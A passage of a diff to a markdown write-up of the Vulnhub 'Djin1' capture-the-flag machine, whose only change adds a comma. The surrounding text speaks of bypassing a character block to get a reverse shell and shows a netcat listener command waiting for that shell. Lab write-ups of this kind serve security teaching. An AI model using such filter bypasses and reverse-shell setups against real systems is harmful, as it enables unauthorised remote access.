joeynaor/writeups/2019-11-27_Vulnhub_Djin1.md

 and don't have `cat` command, we will be able to bypass the character block we encountered earlier, and establish a reverse shell.

-First of all we must listen for incoming connections:
+First of all, we must listen for incoming connections:
 ```bash
 nc -nlvp 7777
 ```